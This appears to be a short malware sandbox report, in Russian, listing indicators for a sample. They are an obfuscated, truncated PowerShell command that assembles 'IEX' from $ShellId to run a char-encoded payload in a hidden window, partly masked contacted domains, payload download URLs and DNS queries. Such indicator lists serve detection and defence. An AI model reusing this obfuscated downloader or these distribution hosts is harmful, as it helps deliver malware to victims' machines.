Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $SheLLid[1]+$SheLlid[13]+'X') (-jOiN ('8{88A127i118T17<66@73{91<1B67p78p70@73A79<88@12M98V73i88V2{123<73B78p111A64i69V73i66B88A23T8{103M86V117p17T11V68i88p88V92T22@3p3<91{91B91<2i74{89B66B72...
- 'fu####ionravera.com':80
- 'fa####nattitude.de':80
- 'se####harassment.in':80
- 'sa##e.in':443
- http://www.fu####ionravera.com/PqhFVpWv2/
- http://fu####ionravera.com/PqhFVpWv2/
- http://www.fa####nattitude.de/Oz2dcK8W/
- http://fa####nattitude.de/Oz2dcK8W/
- http://www.se####harassment.in/bOKB4B/
- 'sa##e.in':443
- DNS ASK fu####ionravera.com
- DNS ASK ma##.###oaiindustries.com
- DNS ASK fa####nattitude.de
- DNS ASK se####harassment.in
- DNS ASK sa##e.in
- DNS ASK sr#####hiventures.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $SheLLid[1]+$SheLlid[13]+'X') (-jOiN ('8{88A127i118T17<66@73{91<1B67p78p70@73A79<88@12M98V73i88V2{123<73B78p111A64i69V73i66B88A23T8{103M86V117p17T11V68i88p88V92T22@3p3<91{91B91<2i74{89B66B72... (со скрытым окном)